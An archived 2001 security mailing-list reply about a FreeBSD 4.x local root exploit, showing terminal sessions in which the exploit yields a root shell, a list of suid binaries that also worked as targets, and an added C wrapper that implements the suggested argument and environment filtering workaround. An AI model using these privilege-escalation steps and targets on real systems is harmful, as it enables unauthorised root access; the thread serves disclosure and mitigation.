Re: FreeBSD 4.3 local root

From: Matias Sedalo (s0t4ipv6at_private)
Date: Sun Jul 15 2001 - 04:17:36 PDT

    one@c0d4:/usr/home/c0d4$ uname
    FreeBSD one.xxx.com.ar 4.1-RELEASE FreeBSD 4.1-RELEASE
    
    one@c0d4:/usr/home/c0d4$ ./sig2
    vvfreebsd. Written by Georgi Guninski
    shall jump to bfbffe89
    child=1371
    login: # done
    
    # id
    uid=1000(c0d4) euid=0(root) gid=20(staff) groups=20(staff)
    #
    
    and with:
    /usr/bin/chfn; /usr/bin/chsh; /usr/bin/ypchpass; /usr/bin/ypchfn;
    /usr/bin/ypchsh; /usr/bin/keyinit; /usr/bin/login; /usr/bin/passwd;
    /usr/libexec/sendmail/sendmail; /usr/local/bin/kcheckpass;
    /usr/local/bin/icmpinfo
    gave me a suid shell too.
    
    On Wed, 11 Jul 2001, Przemyslaw Frasunek wrote:
    
    > > Well, after a bunch of tests I've found only two suids which gave me
    > > suid shell:
    > > /usr/bin/passwd
    > > /usr/local/bin/ssh1
    > 
    > /usr/bin/su also works for me:
    > 
    > riget:venglin:~> egrep -e execl vvfreebsd.c
    >   if(!execl("/usr/bin/su","su","szymon",0))
    > 
    > riget:venglin:~> ./v
    > vvfreebsd. Written by Georgi Guninski
    > shall jump to bfbffe72
    > child=57660
    > Password:done
    > # id
    > uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)
    > 
    > > So, quick workaround should be
    > 
    > Quick workaround is to limit arguments, environment and filter non-ascii
    > characters:
    > 
    > http://www.frasunek.com/sources/security/rexec/
    > 
    > --
    > * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
    > * Inet: przemyslawat_private ** PGP: D48684904685DF43EA93AFA13BE170BF *
    > 
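The reply above names a workaround of three parts: cap the arguments, pass only a minimal environment, and refuse non-ASCII bytes. The code below is an added illustration of that class of wrapper written for this page; it is not the code published at frasunek.com and not part of the thread. The limits (MAX_ARGS, MAX_ARG_LEN, MAX_ENV_LEN), the environment whitelist, and REAL_PATH are assumptions chosen for the example. The idea is that the wrapper is installed setuid in place of each affected binary, the real binary is moved to REAL_PATH, and the wrapper execs it only after the argument and environment checks pass.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Limits are assumptions for this example, not values from the thread. */
#define MAX_ARGS     16
#define MAX_ARG_LEN  256
#define MAX_ENV_LEN  1024

/* Assumed location of the real setuid program after it has been moved. */
#ifndef REAL_PATH
#define REAL_PATH "/usr/libexec/real/passwd"
#endif

extern char **environ;

/* True only if s is printable 7-bit ASCII (0x20..0x7e) and at most max_len bytes. */
static int ascii_ok(const char *s, size_t max_len)
{
    size_t n = 0;
    for (; *s; s++, n++) {
        unsigned char c = (unsigned char)*s;
        if (c < 0x20 || c > 0x7e)
            return 0;
        if (n >= max_len)
            return 0;
    }
    return 1;
}

/* Reject too many arguments, over-long arguments, or any non-ASCII byte. */
int args_ok(int argc, char *const argv[])
{
    if (argc < 1 || argc > MAX_ARGS)
        return 0;
    for (int i = 0; i < argc; i++)
        if (argv[i] == NULL || !ascii_ok(argv[i], MAX_ARG_LEN))
            return 0;
    return 1;
}

/* Whitelist of variables the wrapped program may see (assumption). */
static const char *const allowed_names[] = { "PATH", "HOME", "TERM", "USER", "SHELL", NULL };

/* Copy into out[] (capacity out_cap, NULL-terminated) only the entries of in[]
 * whose name is whitelisted and whose value is printable ASCII within the limit.
 * Entries are pointers into in[], so in[] must outlive out[]. Returns the count kept. */
int filter_env(char *const in[], char *out[], size_t out_cap)
{
    size_t kept = 0;
    for (size_t i = 0; in[i] != NULL && kept + 1 < out_cap; i++) {
        const char *eq = strchr(in[i], '=');
        if (eq == NULL)
            continue;
        size_t name_len = (size_t)(eq - in[i]);
        int allowed = 0;
        for (size_t k = 0; allowed_names[k] != NULL; k++) {
            if (strlen(allowed_names[k]) == name_len &&
                strncmp(allowed_names[k], in[i], name_len) == 0) {
                allowed = 1;
                break;
            }
        }
        if (!allowed || !ascii_ok(eq + 1, MAX_ENV_LEN))
            continue;
        out[kept++] = in[i];
    }
    out[kept] = NULL;
    return (int)kept;
}

/* Wrapper entry point: check argv, rebuild a minimal environment, exec the real binary. */
int main(int argc, char **argv)
{
    if (!args_ok(argc, argv)) {
        fprintf(stderr, "%s: rejected arguments\n", argv[0] ? argv[0] : "wrapper");
        return 1;
    }
    char *env[8];                     /* whitelist has 5 names, so 8 slots is enough */
    filter_env(environ, env, sizeof env / sizeof env[0]);
    execve(REAL_PATH, argv, env);     /* only returns on failure */
    perror("execve");
    return 1;
}
```

The wrapper deliberately keeps argv[0] and the filtered values as the caller supplied them, so a program that inspects its own name still behaves normally; anything outside the whitelist, including loader variables and any value carrying bytes above 0x7e, is dropped before the exec.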
    



    This archive was generated by hypermail 2b30 : Sun Jul 15 2001 - 20:55:57 PDT